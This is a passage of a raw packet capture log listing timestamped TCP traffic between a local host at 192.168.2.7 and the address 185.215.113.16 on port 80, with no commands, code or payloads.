                                                                                                                                                                        Nov 24, 2024 05:11:45.281627893 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.281723022 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.281760931 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.282479048 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.282592058 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.282629967 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.283343077 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.283417940 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.283457041 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.284208059 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.284410000 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.284447908 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.285114050 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.285195112 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.285240889 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.285932064 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.286041021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.286091089 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.286787987 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.286828995 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.286868095 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.287633896 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.287741899 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.287795067 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.288486958 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.288597107 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.288638115 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.289377928 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.289465904 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.289515018 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.290216923 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.290316105 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.290358067 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.291080952 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.291182995 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.291224003 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.291923046 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.292032003 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.292083025 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.292829037 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.293015957 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.293071032 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.293657064 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.293885946 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.293950081 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.294521093 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.294636965 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.294678926 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.295386076 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.295469999 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.295515060 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.296271086 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.296372890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.296425104 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.297084093 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.297202110 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.297244072 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.297945023 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.298053980 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.298100948 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.298852921 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.298973083 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.299025059 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.299640894 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.349143028 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.446571112 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.446662903 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.446778059 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.446954966 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.447051048 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.447097063 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.447824001 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.447978973 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.448049068 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.448672056 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.448772907 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.448815107 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.449528933 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.449704885 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.449743032 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.450381041 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.450485945 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.450540066 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.451248884 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.451369047 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.451412916 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.452128887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.452219009 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.452264071 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.452966928 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.453047037 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.453088999 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.453830957 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.453923941 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.453958988 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.454705954 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.454792976 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.454844952 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.455529928 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.455646992 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.455688953 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.456387043 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.456504107 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.456545115 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.457262993 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.457377911 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.457423925 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.458108902 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.458226919 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.458297014 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.458986044 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.459089994 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.459127903 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.459829092 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.459933996 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.459979057 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.460700035 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.460807085 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.460843086 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.461556911 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.461664915 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.461704016 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.462426901 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.462523937 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.462572098 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.463284969 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.463413000 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.463453054 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.464124918 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.464231968 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.464272976 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.465014935 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.465109110 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.465143919 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.465857029 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.465950012 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.466005087 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.466734886 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.466772079 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.466811895 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.467561960 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.467690945 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.467736006 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.468434095 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.468532085 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.468574047 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.469306946 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.469407082 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.469450951 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.470158100 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.470259905 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.470297098 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.470993996 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.471113920 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.471169949 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.471873045 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.471966982 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.472004890 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.472737074 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.472836971 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.472877026 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.473586082 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.473690033 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.473723888 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.474438906 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.474538088 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.474577904 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.475347042 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.475406885 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.475449085 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.476157904 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.476272106 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.476321936 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.477035046 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.477190018 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.477229118 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.477864027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.477979898 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.478038073 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.478734970 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.478836060 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.478890896 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.479593039 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.479717016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.479760885 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.480451107 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.480571985 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.480612040 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.481314898 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.481411934 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.481451988 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.482177973 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.482314110 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.482357979 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.483041048 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.483155966 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.483191967 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.483896971 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.484029055 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.484071970 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.484749079 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.484853029 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.484906912 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.485613108 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.485723019 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.485779047 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.486491919 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.486619949 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.486664057 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.487335920 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.487463951 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.487507105 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.488185883 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.488307953 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.488348007 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.489039898 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.489155054 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.489196062 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.489912033 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.490012884 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.490056992 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.490778923 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.490881920 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.490916967 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.491574049 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.536442041 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.638583899 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.638710976 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.638777018 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.638885975 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.638968945 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.639004946 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.639784098 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.639842987 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.639902115 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.640608072 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.640779972 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.640830994 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.641484022 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.641590118 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.641627073 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.642324924 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.642482996 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.642522097 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.643194914 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.643301964 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.643343925 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.644057035 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.644172907 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.644217968 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.644926071 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.645008087 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.645045996 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.645945072 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.645982027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.646020889 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.646668911 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.646733999 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.646773100 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.647511005 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.647533894 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.647572041 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.648387909 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.648471117 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.648525953 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.649224043 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.649312019 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.649348021 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.650068045 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.650175095 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.650239944 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.650929928 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.650975943 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.651019096 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.651820898 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.651874065 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.651911020 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.652631044 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.652698994 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.652739048 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.653501034 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.653614998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.653660059 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.654371977 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.654478073 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.654546022 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.655208111 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.655397892 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.655441999 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.656071901 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.656164885 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.656203032 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:45.656922102 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:45.657026052 CET8049761185.215.113.16192.168.2.7
